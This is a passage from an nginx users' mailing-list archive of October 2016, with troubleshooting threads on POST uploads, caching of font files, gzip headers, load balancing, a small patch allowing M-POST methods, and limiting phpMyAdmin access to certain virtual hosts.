I checked file content (actual request body) buffered in /tmp and it contains expected file name ("upload.txt"). When I comment out auth_basic* directives in above config for both cases (for GET and POST) I get "401 Authorization Required". What did I miss? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270063,270063#msg-270063 From francis at daoine.org Tue Oct 4 19:46:42 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 4 Oct 2016 20:46:42 +0100 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <7598f715feca4d51b9a9d738bd221c68.NginxMailingListEnglish@forum.nginx.org> References: <7598f715feca4d51b9a9d738bd221c68.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161004194642.GK11677@daoine.org> On Tue, Oct 04, 2016 at 03:28:18PM -0400, yurai wrote: Hi there, > Unfortunately I get "HTTP/1.1 405 Not Allowed" error code all the time. The "back-end" thing that you POST to must be able to handle the POST. Right now, you just ask nginx to serve a file from the filesystem, which does not accept a POST (by default). > location / { > root /usr/share/nginx/html/foo/bar; > autoindex on; > } Add something like return 200 "Do something sensible with $http_x_file\n"; in there and you'll see that it does work. And then decide what you actually want to do with the file, and make something do that. Good luck with it, f -- Francis Daly francis at daoine.org From justinbeech at gmail.com Wed Oct 5 03:29:32 2016 From: justinbeech at gmail.com (jb) Date: Wed, 5 Oct 2016 14:29:32 +1100 Subject: Safari gets network connection reset over https with very high speed connection Message-ID: Does anyone know how I can debug this issue? nginx (latest version and 1.9 too) running on iMac Safari running on macbook thunderbolt2 cable between the two of them. Any download of https file from nginx downloads random start part of the file then Safari reports in red "The network connection was lost". No other browser has an issue. Doesn't happen with http only https doesn't happen if the connection is throttled down to less than 400 megabit. Happens faster, the faster the connection is... Nothing in the nginx error log. I've reported the bug to Safari however from their response I believe they are not going to find the issue. Can anyone with a fast https connection - maybe to localhost - confirm this problem? Under Sierra and Safari 10. I don't know if the older version of Safari also had this. thanks -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Wed Oct 5 06:39:50 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 5 Oct 2016 07:39:50 +0100 Subject: Rate limit per day In-Reply-To: References: Message-ID: <20161005063950.GM11677@daoine.org> On Mon, Oct 03, 2016 at 02:43:16PM +0530, nitin bhadauria wrote: Hi there, > Is it possible to use Module ngx_http_limit_req_module to rate limit > request / day ? No. (Unless the request rate is so high that it could also be expressed per minute.) The config interface only allows integer requests per second or per minute. The implementation seems to allow integer requests-per-thousand-seconds, but it's not immediately clear to me how exact that can be at low numbers. But if you wanted to play, minor patching could let you set values there, which could be of the order of hundreds of request per day. Perhaps that would work well enough for you? Otherwise, it looks like it would require significant patching to implement what you might want. At that point, you may be better off with a different starting module. Cheers, f -- Francis Daly francis at daoine.org From francis at daoine.org Wed Oct 5 06:55:23 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 5 Oct 2016 07:55:23 +0100 Subject: location query string? In-Reply-To: References: <20160929213233.GE11677@daoine.org> <20161002100709.GH11677@daoine.org> Message-ID: <20161005065523.GN11677@daoine.org> On Tue, Oct 04, 2016 at 10:12:07AM -0700, Grant wrote: Hi there, > > Your later mail suggests that "Keepalive" is involved somehow. If you > > are still keen to investigate -- can you see that nginx does something > > wrong when Keepalive is or is not set? Or does upstream do something > > wrong when Keepalive is or is not set? (If there is an nginx problem, > > I suspect that people will be interested in fixing it. If there is an > > upstream problem, then possibly people there will be interested in fixing > > it, or possibly a workaround can be provided on the nginx side.) > > > Admittedly this is over my head. I would be happy to test and probe > if anyone is interested enough to tell me what to do. I'm guessing quite a bit here, but it sounds like there may be an issue where your nginx believes it makes a http request to upstream without http-keepalive (HTTP/1.0 without Connection:, or with "Connection: close") but your upstream processes it as if it had http-keepalive set; and so upstream does not close the tcp connection after it thinks it completed the http response. In that case, if the response did not have Content-Length set and did not use chunked transfer encoding, then nginx would not know that the http response was complete and would keep waiting for more input. (That would be unusual, since the client is nginx and the upstream is apache, and both are usually reasonable at handing http. Maybe your specific configuration matters.) If you have a reproducible test case, where you make *this* request and the problem manifests itself *that* way, then you have a chance of making changes and testing them and seeing if the problem goes away. If you do not, then it is mostly blind debugging. If you can identify one request/response that is part of the problem, then "tcpdump" or something to see what traffic passes during that request may be useful. But so far, no-one else can reproduce the problem, and I am not sure what the problem actually is. So there is not a recipe of "do exactly this, then exactly that", I'm afraid. f -- Francis Daly francis at daoine.org From brentgclarklist at gmail.com Wed Oct 5 08:39:36 2016 From: brentgclarklist at gmail.com (Brent Clark) Date: Wed, 5 Oct 2016 10:39:36 +0200 Subject: Ngnix wont cache woff Message-ID: Good day Guys Im struggling to get nginx to cache woff and woff2 file. It would appear its the particular wordpress theme is set to not cache. But I would like to override that. Nothing I seem to do, works. If someone could please review my work it would be appreciated. bclark at bclark:~$ curl -I http://$REMOVEDDOMAIN/wp-content/themes/REMOVED-v5-2/fonts/adelle_bold-webfont.woff HTTP/1.1 200 OK Server: nginx Date: Wed, 05 Oct 2016 08:28:31 GMT Content-Type: application/font-woff Content-Length: 41160 Connection: keep-alive Last-Modified: Sun, 01 Nov 2015 15:02:55 GMT ETag: "a0c8-5237bf49e7739" Expires: Wed, 05 Oct 2016 09:28:31 GMT Vary: User-Agent Pragma: public X-Powered-By: W3 Total Cache/0.9.4.1 Cache-Control: max-age=3600 X-Cache-Status: MISS Accept-Ranges: bytes Here is my code: http://pastebin.com/RAVKYipU Kind Regards Brent Clark From nginx-forum at forum.nginx.org Wed Oct 5 10:29:13 2016 From: nginx-forum at forum.nginx.org (sobuz) Date: Wed, 05 Oct 2016 06:29:13 -0400 Subject: Why does nginx always send content encoding as gzip Message-ID: <0f2e356162c3d54170259f2df1e485b9.NginxMailingListEnglish@forum.nginx.org> I have set gzip to off user nginx; worker_processes 1; error_log /var/log/nginx/error.log warn; pid /var/run/nginx.pid; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; access_log /var/log/nginx/access.log main; sendfile on; #tcp_nopush on; keepalive_timeout 65; gzip off; include /etc/nginx/conf.d/*.conf; } Check it is not set anywhere else cd /etc/nginx/ grep -R gzip . ./nginx.conf: gzip off; service nginx restart yet content is still getiing sent as gzip? Response Headers Connection:keep-alive Content-Encoding:gzip Content-Length:51 Content-Type:application/json; charset=utf-8 Date:Wed, 05 Oct 2016 10:00:00 GMT Server:nginx/1.6.2 Vary:Accept-Encoding Any ideas to turn gzip off completely Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270070,270070#msg-270070 From jsharan15 at gmail.com Wed Oct 5 10:59:34 2016 From: jsharan15 at gmail.com (Sharan J) Date: Wed, 5 Oct 2016 16:29:34 +0530 Subject: Nginx old worker process not exiting on reload Message-ID: Hi, While reloading nginx, sometimes old worker process are not exiting thereby, entering into "uninterrupted sleep" state. Is there a way to kill such abandoned worker process? How can this process be avoided? We are using nginx-1.10.1 Thanks, Santhakumari.V -------------- next part -------------- An HTML attachment was scrubbed... URL: From philip.walenta at gmail.com Wed Oct 5 11:05:13 2016 From: philip.walenta at gmail.com (Philip Walenta) Date: Wed, 5 Oct 2016 06:05:13 -0500 Subject: Nginx old worker process not exiting on reload In-Reply-To: References: Message-ID: <74BB23D7-FF1F-460D-8543-31BEC864C2D3@gmail.com> The only thing I ever experienced that would hold an old worker process open after a restart (in my case config reload) were websocket connections. Sent from my iPhone > On Oct 5, 2016, at 5:59 AM, Sharan J wrote: > > Hi, > > While reloading nginx, sometimes old worker process are not exiting thereby, entering into "uninterrupted sleep" state. Is there a way to kill such abandoned worker process? How can this process be avoided? > We are using nginx-1.10.1 > > Thanks, > Santhakumari.V > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From eric.cox at kroger.com Wed Oct 5 11:07:04 2016 From: eric.cox at kroger.com (Cox, Eric S) Date: Wed, 5 Oct 2016 11:07:04 +0000 Subject: Use individual upstream server name as host header Message-ID: <74A4D440E25E6843BC8E324E67BB3E39454EEEDB@N060XBOXP38.kroger.com> Is anyone aware of a way to pass the upstream server name as the host header per individual server instead of setting it at the location level for all the upstream members? Without using a lua script that is. Thanks ________________________________ This e-mail message, including any attachments, is for the sole use of the intended recipient(s) and may contain information that is confidential and protected by law from unauthorized disclosure. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message. -------------- next part -------------- An HTML attachment was scrubbed... URL: From ru at nginx.com Wed Oct 5 11:50:39 2016 From: ru at nginx.com (Ruslan Ermilov) Date: Wed, 5 Oct 2016 14:50:39 +0300 Subject: Use individual upstream server name as host header In-Reply-To: <74A4D440E25E6843BC8E324E67BB3E39454EEEDB@N060XBOXP38.kroger.com> References: <74A4D440E25E6843BC8E324E67BB3E39454EEEDB@N060XBOXP38.kroger.com> Message-ID: <20161005115039.GB5760@lo0.su> On Wed, Oct 05, 2016 at 11:07:04AM +0000, Cox, Eric S wrote: > Is anyone aware of a way to pass the upstream server name as the host header > per individual server instead of setting it at the location level for all the > upstream members? Without using a lua script that is. This is currently impossible. From nginx-forum at forum.nginx.org Wed Oct 5 12:10:10 2016 From: nginx-forum at forum.nginx.org (anish10dec) Date: Wed, 05 Oct 2016 08:10:10 -0400 Subject: Uneven High Load on the Nginx Server In-Reply-To: <20160927175737.GL73038@mdounin.ru> References: <20160927175737.GL73038@mdounin.ru> Message-ID: <33b1f21ad745b46345732332e961dd27.NginxMailingListEnglish@forum.nginx.org> On some of the Severs Waiting is increasing in uneven way like if we have 3 Set of Servers on all of them Active Connections is around 6K and Writing on two of the Server its around 500 -600 while on third ts 3000 . On this server response time is increasing in delivering the content. This happens even if the content is served from cache of nginx. Is any parameter in Nginx causing this, as on stopping the Nginx , the same behaviour shifts to Other Two of them. This is the Nginx Conf which we are using Server is having 60 CPU Cores with 1.5 TB of RAM PFB part of nginx.conf of server with issue : worker_processes auto; events { worker_connections 4096; use epoll; multi_accept on; } worker_rlimit_nofile 100001; http { include mime.types; default_type video/mp4; proxy_buffering on; proxy_buffer_size 4096k; proxy_buffers 5 4096k; sendfile on; keepalive_timeout 30; keepalive_requests 60000; send_timeout 10; tcp_nodelay on; tcp_nopush on; reset_timedout_connection on; gzip off; server_tokens off; Regards, Anish Posted at Nginx Forum: https://forum.nginx.org/read.php?2,269874,270077#msg-270077 From r at roze.lv Wed Oct 5 12:40:42 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 5 Oct 2016 15:40:42 +0300 Subject: Uneven High Load on the Nginx Server In-Reply-To: <33b1f21ad745b46345732332e961dd27.NginxMailingListEnglish@forum.nginx.org> References: <20160927175737.GL73038@mdounin.ru> <33b1f21ad745b46345732332e961dd27.NginxMailingListEnglish@forum.nginx.org> Message-ID: <4C0AE5ACAD6349B994224759F6756832@MasterPC> > On some of the Severs Waiting is increasing in uneven way like if we have > 3 Set of Servers on all of them Active Connections is around 6K and > Writing on two of the Server its around 500 -600 while on third ts 3000 > as on stopping the Nginx , the same behaviour shifts to Other Two of them. What do you use to distribute the load/requests between the set of servers? Without knowing any other details/metrics this would just indicate that the balancing mechanism/solution doesn't do the job the way you would expect. Just for example a simple dns roundrobin while in long term works fine (the requests are distributed somewhat eventy) still the load on the first entry/server is always (a bit) higher. rr From nginx-forum at forum.nginx.org Wed Oct 5 12:51:41 2016 From: nginx-forum at forum.nginx.org (anish10dec) Date: Wed, 05 Oct 2016 08:51:41 -0400 Subject: Uneven High Load on the Nginx Server In-Reply-To: <4C0AE5ACAD6349B994224759F6756832@MasterPC> References: <4C0AE5ACAD6349B994224759F6756832@MasterPC> Message-ID: <2da49a7942cafac07cd2eb5550dd8985.NginxMailingListEnglish@forum.nginx.org> We are using Haproxy to distribute the load on the Servers. Load is ditributed on the basis of URI, with parameter set in haproxy config as "balance uri". This has been done to achieve maximum Cache Hit from the Server. Does high number of Writing is leading to increase in response time for delivering the content ? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,269874,270080#msg-270080 From anoopalias01 at gmail.com Wed Oct 5 13:04:06 2016 From: anoopalias01 at gmail.com (Anoop Alias) Date: Wed, 5 Oct 2016 18:34:06 +0530 Subject: proxying to upstream port based on scheme Message-ID: I have an httpd upstream server that listen on both http and https at different port and want to send all http=>http_upstream and https => https_upstream The following does the trick ##################### if ( $scheme = https ) { set $port 4430; } if ( $scheme = http ) { set $port 9999; } location / { proxy_pass $scheme://127.0.0.1:$port; } ##################### Just wanted to know if this is very inefficient (if-being evil) than hard-coding the port and having two different server{} blocks for http and https . Thanks in advance. -- *Anoop P Alias* -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Wed Oct 5 13:08:13 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 5 Oct 2016 16:08:13 +0300 Subject: Uneven High Load on the Nginx Server In-Reply-To: <2da49a7942cafac07cd2eb5550dd8985.NginxMailingListEnglish@forum.nginx.org> References: <4C0AE5ACAD6349B994224759F6756832@MasterPC> <2da49a7942cafac07cd2eb5550dd8985.NginxMailingListEnglish@forum.nginx.org> Message-ID: > Load is ditributed on the basis of URI, with parameter set in haproxy > config as "balance uri". > This has been done to achieve maximum Cache Hit from the Server. While the cache might be more efficient this way this can lead to one server always serving some "hot" content while others stay idle. If you can afford to shrink the cache you could try the haproxy's leastconn mechanism. It will innitially a increase the load on the backend (cache needs to downloaded 3 times (if not configured to look up the neighbors first)) but the load on the frontends should always be more or less even. > Does high number of Writing is leading to increase in response time for > delivering the content ? Of course, it means that more clients are getting the data at the same time (more disk/network io etc). rr From francis at daoine.org Wed Oct 5 13:24:54 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 5 Oct 2016 14:24:54 +0100 Subject: Ngnix wont cache woff In-Reply-To: References: Message-ID: <20161005132454.GO11677@daoine.org> On Wed, Oct 05, 2016 at 10:39:36AM +0200, Brent Clark wrote: Hi there, > Im struggling to get nginx to cache woff and woff2 file. > > It would appear its the particular wordpress theme is set to not cache. > But I would like to override that. > bclark at bclark:~$ curl -I > http://$REMOVEDDOMAIN/wp-content/themes/REMOVED-v5-2/fonts/adelle_bold-webfont.woff > Expires: Wed, 05 Oct 2016 09:28:31 GMT > Vary: User-Agent > Pragma: public > Cache-Control: max-age=3600 > Here is my code: http://pastebin.com/RAVKYipU For "woff", that has: proxy_ignore_headers Cache-Control Vary Expires Set-Cookie X-Accel-Expires; proxy_cache_valid 404 1m; For "swf" it has: proxy_ignore_headers Vary; proxy_cache_valid 404 3m; For how long do you want your "woff" content cached by nginx? If it is a fixed amount, set proxy_cache_valid suitably. If it is "whatever Cache-Control says", remove that from proxy_ignore_headers. (Aside: it is usually friendlier to include the config in the email, so that someone in next year will be able to see the complete question. It's possible that that pastebin link may not have the same content as today, then.) Cheers, f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Wed Oct 5 13:30:00 2016 From: nginx-forum at forum.nginx.org (smaig) Date: Wed, 05 Oct 2016 09:30:00 -0400 Subject: nginx worker process exited on signal 7 In-Reply-To: <20161003151313.GE73038@mdounin.ru> References: <20161003151313.GE73038@mdounin.ru> Message-ID: Thanks Maxim, we'll try this. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270043,270084#msg-270084 From nginx-forum at forum.nginx.org Wed Oct 5 13:42:28 2016 From: nginx-forum at forum.nginx.org (anish10dec) Date: Wed, 05 Oct 2016 09:42:28 -0400 Subject: Uneven High Load on the Nginx Server In-Reply-To: References: Message-ID: <881970201c39356c8b6dbfb42f8ce7c5.NginxMailingListEnglish@forum.nginx.org> Actually, its not the case that More number of Clients are trying to get the content from One of Server as Server Throughput shows equal load on all interfaces of Server which is around 4 Gbps. So Do I expect , Writing will Increase with more number of Active Connections. Is it so that Nginx is not able to handle the load of as much connections and due to which requests is going into Writing Mode and Nginx not releasing it Posted at Nginx Forum: https://forum.nginx.org/read.php?2,269874,270085#msg-270085 From nginx-forum at forum.nginx.org Wed Oct 5 14:40:05 2016 From: nginx-forum at forum.nginx.org (nixcoder) Date: Wed, 05 Oct 2016 10:40:05 -0400 Subject: 400 bad request for http m-post method Message-ID: <5edc178411db579b66361f64b751ee26.NginxMailingListEnglish@forum.nginx.org> Hi, I'm getting the below error in nginx reverse proxy server. It seems the proxy server does not recognize the http method: "M-POST" ? Is there a way i can allow these incoming requests ? nginx.1 | xxxx.xxx.xxx 10.x.xx.x - - [05/Oct/2016:10:31:57 +0000] "M-POST /cimom HTTP/1.1" 400 166 "-" "-" nginx.1 | xxxx.xxx.xxx 10.x.xx.x - - [05/Oct/2016:10:31:57 +0000] "M-POST /cimom HTTP/1.1" 400 166 "-" "-" Thanks in advance. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270087,270087#msg-270087 From mdounin at mdounin.ru Wed Oct 5 15:25:45 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 5 Oct 2016 18:25:45 +0300 Subject: 400 bad request for http m-post method In-Reply-To: <5edc178411db579b66361f64b751ee26.NginxMailingListEnglish@forum.nginx.org> References: <5edc178411db579b66361f64b751ee26.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161005152545.GU73038@mdounin.ru> Hello! On Wed, Oct 05, 2016 at 10:40:05AM -0400, nixcoder wrote: > Hi, > I'm getting the below error in nginx reverse proxy server. It seems the > proxy server does not recognize the http method: "M-POST" ? Is there a way i > can allow these incoming requests ? > > nginx.1 | xxxx.xxx.xxx 10.x.xx.x - - [05/Oct/2016:10:31:57 +0000] "M-POST > /cimom HTTP/1.1" 400 166 "-" "-" > nginx.1 | xxxx.xxx.xxx 10.x.xx.x - - [05/Oct/2016:10:31:57 +0000] "M-POST > /cimom HTTP/1.1" 400 166 "-" "-" Only "A" .. "Z" and "_" are allowed in method names by nginx. If you want to allow "M-POST", please try the following patch: # HG changeset patch # User Maxim Dounin # Date 1475681003 -10800 # Wed Oct 05 18:23:23 2016 +0300 # Node ID fb39836bb3708b26629eaea06fe1221e39daa253 # Parent 9b9ae81cd4f01ed60e7bab323d49b470cec69d9e Allowed '-' in method names. It is used at least by SOAP (M-POST method, defined by RFC 2774) and by WebDAV versioning (VERSION-CONTROL and BASELINE-CONTROL methods, defined by RFC 3253). diff --git a/src/http/ngx_http_parse.c b/src/http/ngx_http_parse.c --- a/src/http/ngx_http_parse.c +++ b/src/http/ngx_http_parse.c @@ -149,7 +149,7 @@ ngx_http_parse_request_line(ngx_http_req break; } - if ((ch < 'A' || ch > 'Z') && ch != '_') { + if ((ch < 'A' || ch > 'Z') && ch != '_' && ch != '-') { return NGX_HTTP_PARSE_INVALID_METHOD; } @@ -270,7 +270,7 @@ ngx_http_parse_request_line(ngx_http_req break; } - if ((ch < 'A' || ch > 'Z') && ch != '_') { + if ((ch < 'A' || ch > 'Z') && ch != '_' && ch != '-') { return NGX_HTTP_PARSE_INVALID_METHOD; } -- Maxim Dounin http://nginx.org/ From vbart at nginx.com Wed Oct 5 15:32:58 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Wed, 05 Oct 2016 18:32:58 +0300 Subject: proxying to upstream port based on scheme In-Reply-To: References: Message-ID: <6504454.EPfo57qKWK@vbart-workstation> On Wednesday 05 October 2016 18:34:06 Anoop Alias wrote: > I have an httpd upstream server that listen on both http and https at > different port and want to send all http=>http_upstream and https => > https_upstream > > The following does the trick > > ##################### > if ( $scheme = https ) { > set $port 4430; > } > if ( $scheme = http ) { > set $port 9999; > } > > location / { > > proxy_pass $scheme://127.0.0.1:$port; > } > ##################### > > Just wanted to know if this is very inefficient (if-being evil) than > hard-coding the port and having two different server{} blocks for http and > https . > [..] Why don't use map? map $scheme $port { http 9999; https 4430; } proxy_pass $scheme://127.0.0.1:$port; wbr, Valentin V. Bartenev From me at myconan.net Wed Oct 5 15:36:21 2016 From: me at myconan.net (Edho Arief) Date: Thu, 06 Oct 2016 00:36:21 +0900 Subject: proxying to upstream port based on scheme In-Reply-To: <6504454.EPfo57qKWK@vbart-workstation> References: <6504454.EPfo57qKWK@vbart-workstation> Message-ID: <1475681781.1951403.746776561.6FD18030@webmail.messagingengine.com> Hi, On Thu, Oct 6, 2016, at 00:32, Valentin V. Bartenev wrote: > On Wednesday 05 October 2016 18:34:06 Anoop Alias wrote: > > I have an httpd upstream server that listen on both http and https at > > different port and want to send all http=>http_upstream and https => > > https_upstream > > > > Why don't use map? > > map $scheme $port { > http 9999; > https 4430; > } > > > proxy_pass $scheme://127.0.0.1:$port; > > or two separate server block... From r at roze.lv Wed Oct 5 18:33:42 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 5 Oct 2016 21:33:42 +0300 Subject: Uneven High Load on the Nginx Server In-Reply-To: <881970201c39356c8b6dbfb42f8ce7c5.NginxMailingListEnglish@forum.nginx.org> References: <881970201c39356c8b6dbfb42f8ce7c5.NginxMailingListEnglish@forum.nginx.org> Message-ID: <017a01d21f36$ff9d0020$fed70060$@roze.lv> > Actually, its not the case that More number of Clients are trying to get the > content from One of Server as Server Throughput shows equal load on all > interfaces of Server which is around 4 Gbps. This contradicts (or I understood it differently) a bit what you wrote previously. But what I got was - if you shutdown (or disable) the "slow nginx" then the behavior shifts to the remainin. Which to me indicates that the balancing via URI doesn't result in even load to servers or at least with current software (nginx)/hardware configuration it leads to the same result which means that particular server instance isn't at fault. I reread your initial post and some other things don't seem right to me: - "We see that out of two server on which load is high i.e around 5" but later your write "Server is having 60 CPU Cores with 1.5 TB of RAM" - a 5 load on 60 core cpu machine means that server has only ~8% load which isn't very high or is it a typo? But you could look at the haproxy status page and see if there aren't big differences in currently active connections to backends and/or the "slow" backend doesn't have way more (completed) requests - as just plainly comparing network interface throughput doesn't always indicate the work the server needs to do - you could saturate the 4Gbps link by sending a single 100Gb file to a single client with ~500MB/s the same time another server could send 1Mb requests to 500 clients or 50000 clients each downloading 10kb but the resulting load could be way different. rr From nginx-forum at forum.nginx.org Thu Oct 6 04:28:36 2016 From: nginx-forum at forum.nginx.org (c0nw0nk) Date: Thu, 06 Oct 2016 00:28:36 -0400 Subject: Why does nginx always send content encoding as gzip In-Reply-To: <0f2e356162c3d54170259f2df1e485b9.NginxMailingListEnglish@forum.nginx.org> References: <0f2e356162c3d54170259f2df1e485b9.NginxMailingListEnglish@forum.nginx.org> Message-ID: You should check your application sounds like that is compressing its pages. A simple test is this create a empty html file and serve that from a location and check the headers. location = /test.html { root "path/to/html/file"; } if the headers on that have no gzip compression as set in your nginx config then you know its your web application gzipping. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270070,270096#msg-270096 From nginx-forum at forum.nginx.org Thu Oct 6 07:59:38 2016 From: nginx-forum at forum.nginx.org (anish10dec) Date: Thu, 06 Oct 2016 03:59:38 -0400 Subject: Uneven High Load on the Nginx Server In-Reply-To: <017a01d21f36$ff9d0020$fed70060$@roze.lv> References: <017a01d21f36$ff9d0020$fed70060$@roze.lv> Message-ID: <118ad0c4aa4fd3c27c50e408362c94cf.NginxMailingListEnglish@forum.nginx.org> > I reread your initial post and some other things don't seem right to > me: > - "We see that out of two server on which load is high i.e around 5" > but later your write "Server is having 60 CPU Cores with 1.5 TB of > RAM" - a 5 load on 60 core cpu machine means that server has only ~8% > load which isn't very high or is it a typo? Load was mentioned compared to other server , On the Server were Writing is 500-600 load is around 0.5 - 0.8 While on the problematic Server were Writing is in 3000 load is 5. So, totally agree with you that on such a high configuration server this load is minimal. So, it might not be load , but large number of Writing which is increasing the response time and at same time load. > But you could look at the haproxy status page and see if there aren't > big differences in currently active connections to backends and/or the > "slow" backend doesn't have way more (completed) requests - as just Will look into haproxy config and share the observation. One more observation is that over the day this Writing remains balance on all the Server , though Active Connections remains 10k to 11K. But at Night , on different Set of Server if the connection reaches 6k to 7k at night , the Writing gets Varied . Since at night there is high load on the Network as more number of users trying to access the Video/Songs , so is there any possibility that Network might be contributing high number of Writing on any one of Server. Can there be some issue at Network Side ? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,269874,270097#msg-270097 From nginx-forum at forum.nginx.org Thu Oct 6 20:43:07 2016 From: nginx-forum at forum.nginx.org (ezak) Date: Thu, 06 Oct 2016 16:43:07 -0400 Subject: strange condition file not found nginx with php-fpm Message-ID: I was working with this config from 2 years without any problem sudenly I face not found error message from niginx and its come only when the link has "?", sample http://firmware.gem-flash.com/index.php?a=browse&b=category&id=1 if open the normal link, its working http://firmware.gem-flash.com/index.php http://firmware.gem-flash.com/[any other php file].php site config (changed user info) server { listen *:80; server_name firmware.gem-flash.com; #error_log /var/log/nginx/firmware.gem-flash.com.log error; rewrite_log on; root /home/user/public_html/; location / { index index.php index.html index.htm ; } location ~* ^.+\.(jpg|jpeg|gif|css|html|png|js|ico|bmp|zip|rar|txt|pdf|doc)$ { root /home/user/public_html/; # expires max; access_log off; } location ~ ^/.+\.php { fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_intercept_errors on; include /etc/nginx/fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_script_name; } } Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270104,270104#msg-270104 From nginx-forum at forum.nginx.org Thu Oct 6 22:07:51 2016 From: nginx-forum at forum.nginx.org (mrast) Date: Thu, 06 Oct 2016 18:07:51 -0400 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx Message-ID: I have an ubuntu 16.04 server running LEMP with 4 websites on it website.com website1.com website2.com website3.com I have installed phpmyadmin and configured it and it works fine, however it serves all 4 websites. website1 and website3 do not need access to phpmyadmin. How do i tell Nginx to only load phpmyadmin for certian websites please? Thankyou Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270105,270105#msg-270105 From philip.walenta at gmail.com Fri Oct 7 12:03:19 2016 From: philip.walenta at gmail.com (Philip Walenta) Date: Fri, 7 Oct 2016 07:03:19 -0500 Subject: Practical size limit of config files Message-ID: Is there a practical maximum size limit for config files? What is possible - 100k, 1MB, 10MB? -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Fri Oct 7 13:24:12 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Fri, 7 Oct 2016 16:24:12 +0300 Subject: Practical size limit of config files In-Reply-To: References: Message-ID: <20161007132411.GI73038@mdounin.ru> Hello! On Fri, Oct 07, 2016 at 07:03:19AM -0500, Philip Walenta wrote: > Is there a practical maximum size limit for config files? > > What is possible - 100k, 1MB, 10MB? I think this mostly depends on your ability as an administrator to manage such a configuration. I've worked with configurations larger than 10MB, though most of these megabytes were in geo{} and map{} bases managed separately. -- Maxim Dounin http://nginx.org/ From francis at daoine.org Fri Oct 7 13:33:19 2016 From: francis at daoine.org (Francis Daly) Date: Fri, 7 Oct 2016 14:33:19 +0100 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx In-Reply-To: References: Message-ID: <20161007133319.GU11677@daoine.org> On Thu, Oct 06, 2016 at 06:07:51PM -0400, mrast wrote: Hi there, > I have installed phpmyadmin and configured it and it works fine, however it > serves all 4 websites. > > website1 and website3 do not need access to phpmyadmin. > > How do i tell Nginx to only load phpmyadmin for certian websites please? Look at your config for the server{} block for website1. Find the piece that relates to phpmyadmin. Remove it. The server{} block is identified by "server_name" including "website1". You can "find the piece" by looking at the "location" blocks that are defined, and learning one request that makes use of phpmyadmin, and seeing which one "location" handles that request -- http://nginx.org/r/location for details. If it turns out that you only have one server{} block for all four websites, then it is probably simplest to copy-and-change it to two or four different blocks with different "server_name" values, and then remove the phpmyadmin part from the website1 and website3 block or blocks. Good luck with it, f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Fri Oct 7 14:20:51 2016 From: nginx-forum at forum.nginx.org (mrast) Date: Fri, 07 Oct 2016 10:20:51 -0400 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx In-Reply-To: <20161007133319.GU11677@daoine.org> References: <20161007133319.GU11677@daoine.org> Message-ID: Hello Francis, Thankyou for your reply. I have seperate config files for each website in /etc/nginx/sites-enabled and have removed the default file I have this directive in /etc/nginx/nginx.conf ## # Virtual Host Configs ## include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*; server { listen 80 default_server; server_name _; return 444; } This is the start of my server block for website2 that i do want phpmyadmin access for server { server_name website.com www.website.com; and the only phpmyadmin directive is for a pre-auth login box before the phpam login page displays location /phpmyadmin { auth_basic "Admin Login"; auth_basic_user_file /etc/nginx/allow_phpmyadmin; } If i remove the /phpmyadmin section from website1 config file, it just removes the pre-auth login box and goes straight to the main phpma screen. I have a symlink for nginx to use phpmyadmin /usr/share/phpmyadmin /usr/share/nginx/html I have a symlink in website2 and 4 directory's for /usr/share/phpmyadmin i dont have any symlinks in websites 1 and 3 directory's for /usr/share/phpmyadmin - but yet these websites are still server /phpmyadmin Im not sure what i need to remove after reading your reply - Shall i remove the server_name line from the nginx.conf file? Thankyou Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270105,270117#msg-270117 From nginx-forum at forum.nginx.org Fri Oct 7 19:47:47 2016 From: nginx-forum at forum.nginx.org (yurai) Date: Fri, 07 Oct 2016 15:47:47 -0400 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <20161004194642.GK11677@daoine.org> References: <20161004194642.GK11677@daoine.org> Message-ID: <8260e5aeb7dcb440714376bc3d0f2d37.NginxMailingListEnglish@forum.nginx.org> Hi Francis, I added return statement to my config as you suggested. Now config for backend s2 looks like: server { listen 8080; server_name s2; location / { root /usr/share/nginx/html/foo/bar; return 200 "Do something sensible with $http_x_file\n"; autoindex on; } } Unfortunately still it doesn't work as I expect - upload.txt file content is not saved on server side in /tmp/nginx-client-body. My understanding is that transfer should be performed in 2 phases (2 POST 